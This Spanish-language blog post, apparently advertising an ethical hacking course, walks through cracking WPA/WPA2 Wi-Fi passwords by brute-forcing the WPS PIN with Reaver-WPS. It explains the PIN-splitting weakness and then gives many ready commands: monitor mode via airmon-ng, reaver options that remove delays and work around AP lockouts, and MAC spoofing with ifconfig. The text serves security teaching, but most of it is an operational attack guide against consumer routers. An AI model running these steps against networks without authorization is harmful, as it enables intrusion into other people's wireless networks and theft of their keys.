Reaver-WPS desempeña
un ataque de fuerza bruta contra el número de pin de WiFi de un punto de
acceso. Una vez encontrado el pin de WPS, WPA PSK se puede recuperar y
alternativamente la configuración inalámbrica de AP puede ser reconfigurada.
Con ayuda de profesores de curso de seguridad en redes y ethical hacking describimos los pasos
y los comandos que ayudan al cracking las contraseñas WPA Wifi / WPA2
utilizando Reaver-WPS.
Reaver-wps enfoca
sobre la funcionalidad de registro externo exigido por la especificación de la
configuración de Wi-Fi protegida. Los puntos de acceso proporcionarán
registradores autenticados con su configuración inalámbrica actual (incluyendo
la WPA PSK), y también aceptan una nueva configuración del registrador.
Con el fin de
autenticar como registrador, el registrador debe demostrar su conocimiento del
número de PIN de 8 dígitos de la AP. Los registradores podrán autenticarse en
un punto de acceso en cualquier momento y sin interacción con el usuario. Dado
que el protocolo WPS se lleva a cabo sobre EAP, el registrador sólo tiene que
estar asociado con el AP y no necesita ningún conocimiento previo de la
encriptación o la configuración inalámbrica explica el profesor de curso de seguridad en redes y
ethical hacking.
Reaver-WPS desempeña
un ataque de fuerza bruta contra la AP, intentando todas las combinaciones
posibles con el fin de adivinar el número PIN de 8 dígitos de la AP. Dado que
el número de pines son totalmente numéricos, hay 10 ^ 8 (100.000.000) valores
posibles para cualquier número de pin dado. Según experto de ethical hacking,
el último dígito del pin es un valor de suma de control que puede ser calculada
en base a los 7 dígitos anteriores, que el espacio clave se reduce a 10 ^ 7
(10, 000,000) valores posibles.
Otro factor que afecta
la seguridad en redes es la longitud de la clave. Longitud de claves se reduce
aún más debido al hecho de que el protocolo de autenticación WPS corta el pin
en medio y valida cada medio individual. Eso significa que hay 10 ^ 4 (10.000)
valores posibles para la primera mitad del pin y 10 ^ 3 (1000) valores posibles
para la segunda mitad del pin, con el último dígito del pin siendo una suma de
comprobación.
Reaver-WPS adivina la
primera mitad del pin y luego la segunda mitad del pin, lo que significa que
todo la longitud de clave para el número PIN WPS puede agotarse en 11.000
intentos. Estadísticamente, sólo tendrá la mitad de ese tiempo con el fin de
adivinar el número PIN correcto. Vamos a ver cómo configurar e instalar
Reaver-WPS con ayuda de profesores de curso de seguridad en redes y ethical
hacking.
INSTALACIÓN:
Instalar Linux Kali,
todo construido en él. (Reaver-WPS, libpcap y libsqlite3)
USO:
Generalmente los
únicos argumentos necesarios para Reaver-WPS son el nombre de la interfaz y el
BSSID del AP objetivo:
# reaver -i mon0 -b 00:01:02:03:04:05
El canal y el SSID del
AP objetivo serán identificados automáticamente por Reaver-WPS, salvo que se
especifique explícitamente en la línea de comandos:
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e
linksys
Por defecto, si el
punto de acceso cambia de canal, Reaver-WPS también cambiar su canal en
consecuencia. Sin embargo, esta función puede ser desactivada mediante la
fijación del canal de la interfaz explica experto de ethical hacking:
# reaver -i mon0 -b 00:01:02:03:04:05 –fixed
La recepción
predeterminada del tiempo de espera es de 5 segundos. Este período de tiempo de
espera se puede ajustar manualmente si es necesario.
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
El período de demora
predeterminado entre los intentos del pin es de 1 segundo. Este valor puede ser
aumentado o disminuido a cualquier valor entero no negativo. Un valor de cero
significa que no hay retraso:
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Algunas APs bloquearán
temporalmente su estado WPS, por lo general durante cinco minutos o menos,
cuando se detecte actividad “sospechosa”. De forma predeterminada cuando se
detecte un estado bloqueado, Reaver-WPS comprobara el estado cada 315 segundos
y no continuara ataques de fuerza bruta al pin hasta que el estado WPS este
desbloqueado. Según profesores de curso de seguridad en redes y ethical
hacking, esta comprobación puede ser aumentada o disminuida a cualquier valor
no negativo:
# reaver -i mon0 -b 00:01:02:03:04:05
–lock-delay=250
Para un resultado
adicional, la opción verbose puede ser proporcionada. Proporcionando la verbose
dos veces aumentará la verbosidad y mostrará cada número del pin, ya que se intenta:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
El período de tiempo
de espera predeterminado para la recepción de los mensajes de respuesta M5 y M7
WPS es .1 segundo. Este período de tiempo de espera se puede ajustar
manualmente si es necesario (tiempo de espera máximo es de 1 segundo):
# reaver -i mon0 -b 00:01:02:03:04:05 -T .5
Aunque la mayoría de
AP no les importa, el envío de un mensaje de EAP FAIL para cerrar una sesión
WPS. Por defecto esta función está desactivada, pero se puede habilitar para
aquellas AP que lo necesitan:
# reaver -i mon0 -b 00:01:02:03:04:05
–eap-terminate
En primer lugar,
asegúrese de que su tarjeta inalámbrica está en modo monitor:
# airmon-ng start wlan0
Para ejecutar Reaver,
debe especificar el BSSID del AP objetivo y el nombre de la interfaz en modo
monitor (por lo general ‘mon0’, no ‘wlan0’, aunque esto puede variar en función
de la tarjeta inalámbrica / controladores):
# reaver -i mon0 -b 00:01:02:03:04:05
Es probable que
también desee utilizar -vv para obtener información verbose sobre progreso de
Reaver:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
ACELERANDO
EL ATAQUE
De forma
predeterminada, Reaver-WPS tiene un retardo de 1 segundo entre los intentos del
pin. Puede deshabilitar este retraso añadiendo ‘-d 0’ en la línea de comandos,
pero a algunas AP podría no gustarle menciona el profesor de curso de seguridad
en redes y ethical hacking:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Otra opción que puede
acelerar un ataque es -dh-small. Esta opción indica a Reaver para utilizar un
pequeño número secreto diffie-Hellman con el fin de reducir la carga
computacional en la AP objetivo:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
–dh-small
SUPLANTACIÓN
DE MAC
En algunos casos es
posible que se desee / necesite suplantar tu dirección MAC. Reaver es
compatible con Suplantación de MAC con la opción -mac, pero hay que asegurarse de
que ha falsificado su MAC correctamente con el fin de que funcione.
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
–mac=00:BA:AD:BE:EF:69
Controladores
inalámbricos compatibles
Los siguientes
controladores inalámbricos han sido probados o reportados para trabajar con
éxito con Reaver-WPS:
ath9k
rtl8187
carl19170
ipw2000
rt2800pci
rt73usb
SÓLO
DE FORMA PARCIAL
Los siguientes
controladores inalámbricos han tenido un éxito relativo, y pueden o no pueden
trabajar en función de su tarjeta inalámbrica
ath5k
iwlagn
rtl2800usb
b43
CONCLUSIÓN
Si desea Pentest o
Hackear sus contraseñas Wifi, entonces lo primero que se necesita es una
tarjeta Wi-Fi compatible. Durante el curso de seguridad en redes y ethical
hacking, tu tendrás la oportunidad de aprender a PenTest o hackear contraseñas
Wifi, cómo inyectar, falsificar, configurar una AP falsa o Honeypot.
0 comments:
Post a Comment